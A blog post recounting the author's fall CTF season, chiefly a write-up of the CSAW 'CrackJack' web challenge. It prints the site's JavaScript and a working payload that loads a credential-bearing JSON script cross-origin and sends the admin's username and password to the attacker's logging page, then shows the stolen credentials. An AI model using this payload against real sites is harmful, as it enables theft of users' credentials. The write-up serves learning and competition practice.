It's fall again, and like every year, many CTF are happening in those few months.
Earlier this week I participated in the hack.lu CTF. A CTF organized by the FluxFingers team as a part of the hack.lu conference in luxembourg. It was a pretty cool CTF with interesting challenges to solve. I'm not going to do any writeup since there was really nothing interesting to say about the challenges I worked on. You can always find writeups on the web if you're interested. There are a few on shell-storm.org.
I also participated in the CSAW (Cyber Security Awareness Week) CTF qualification round this week-end. It's a CTF organized by NYU-poly. It will probably just have ended by the time I post this. This CTF was pretty easy and we solved most challenges on the first day. The only challenges left on the second day were either broken or guessing bullsh*t.
One of the challenge involved calling a voicemail in the US where a guy supposedly from a burritos restaurant asked us if we wanted burritos... then we had to guess the key was the exact sentence pronounced by the guy on the voicemail. "wouldyoulikeburritoswiththat" ? :)). Kudos to teach for finding that one.
Anyway, one of the interesting things about this CTF is the number of "simulated" client side/xss challenges. It's not something we see very often in CTFs and it's a nice change from SQL Injections/PHP vulns. One of such challenge was "CrackJack". A 500 point web chall that we solved on the second day.
It consisted of a website with a contact, user list and profile page, all relying heavily on XMLHttpRequest/JSON. We quickly audited the website and it seemed like all input was filtered properly. sh4ka checked the contact page and noticed that urls in the message were visited by a bot with an IP belonging to NYU and a Konqueror user-agent. Even better, javascript was executed, so we could execute arbitrary JS code in the site admin's browser :P
We looked for a potential CSRF vuln or anything we could leverage to get admin rights on the website, but there was nothing. Because of same-origin policy in web browsers we could not request an arbitrary page through XMLHttpRequest.
The website's profile page used XMLHttpRequest to retreive user info.
function getCurrent() { var xmlhttp; if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } else { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4 && xmlhttp.status==200) { eval(xmlhttp.responseText); userinfo = document.getElementById('userinfo'); if(!current.authenticated) { userinfo.innerHTML = "You aren't logged in! <a href='login.php'>Log in here.</a>"; } else { userinfo.innerHTML = "Your username: "+current.username; userinfo.innerHTML += "<br />Your password: "+current.password+" (keep it safe!)"; userinfo.innerHTML += "<br />Your access level: "+current.access+" ("+(current.access>100 ? "admin" : "not admin")+")"; } } } xmlhttp.open("GET","json/getcurrent.js",true); xmlhttp.send(); }
getcurrent.js is actually a php page which returns all informations on the current user (including the password) in JSON format.
var current = {"authenticated":true,"access":"1","username":"haxor","password":"abc123"};
We realized we could simply include this file in our own exploit page with a <script> element and get current's value without having to worry about same origin policy.
We pretty much knew everything we needed in order to pwn this chall, but unfortunately the bot was lagging and behaving erratically, taking up to an hour to visit a page we sent through the contact form. We still managed to get a working code, submited the url and waited patiently. After some time, we noticed the bot had visited the page but had not send back the data we wanted (the value of "current"). We tried some variation of the code but nothing seemed to work.
At this point, the admins sent everyone a mail containing a hint:
For people who are stuck on CrackJack/Web Challenge 5, the local IP address is 192.168.4.4. This may make solving the challenge easier/more possible (although one person has already solved it without the hint!)
WTF ? A local IP ? Up until now, we only tried to include getcurrent.js through its public URL: http://csawctf.poly.edu:40004/challenge2/json/getcurrent.js But apparently we could not do that directly or else our first code would have worked by now.
I used beef's network fingerprinting module to scan 192.168.4.4 and found that port 80 was open. At this point in the game it was probably 6/7am CEST and I was pretty exhausted so I went to sleep, expecting to find this challenge solved when I woke up.
Unfortunately, sh4ka had not managed to solve it because of a weird bug in the challenge (for some reason getcurrent.json always contained authenticated: false when he tried to exploit it). I decided to try myself, so I simply adapted the payload by changing the host to 192.168.4.4:
var headID = document.getElementsByTagName("head")[0]; var newScript = document.createElement('script'); newScript.type = 'text/javascript'; newScript.src = 'http://192.168.4.4/challenge2/json/getcurrent.js'; newScript.addEventListener('load', function() { toalert='' for(i in window.current) toalert+=i+': '+current[i]+'\n'; document.write("<img src='./log.php?"+encodeURI(toalert)+"'/>"); }, false); headID.appendChild(newScript); return 1
And I was lucky:
authenticated: true access: 1000 username: administrator password: 2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8
For a split second, I feared the password might be a hash I would need to break, but no, it's the actual plain-text password.
And last... I have somthing I would like to say.
!£*ù FUCKING TURKEYS !!!11! (you know who you are)
